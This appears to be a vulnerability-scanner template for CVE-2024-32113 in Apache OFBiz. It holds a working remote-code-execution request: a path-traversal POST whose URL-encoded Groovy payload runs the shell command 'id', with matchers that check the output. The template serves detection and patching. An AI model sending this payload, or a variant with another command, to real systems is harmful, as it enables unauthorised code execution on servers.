id: CVE-2024-32113 info: name: Apache OFBiz Directory Traversal - Remote Code Execution author: DhiyaneshDK severity: high description: | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13 remediation: | Users are recommended to upgrade to version 18.12.13, which fixes the issue. reference: - https://issues.apache.org/jira/browse/OFBIZ-13006 - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd - https://ofbiz.apache.org/download.html - https://ofbiz.apache.org/security.html - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit - https://nvd.nist.gov/vuln/detail/CVE-2024-32113 classification: cve-id: CVE-2024-32113 epss-score: 0.00115 epss-percentile: 0.45112 metadata: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" tags: cve,cve2024,apache,obiz,rce http: - raw: - | POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74); matchers-condition: and matchers: - type: regex part: body regex: - "java.lang.Exception:" - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)" condition: and - type: status status: - 200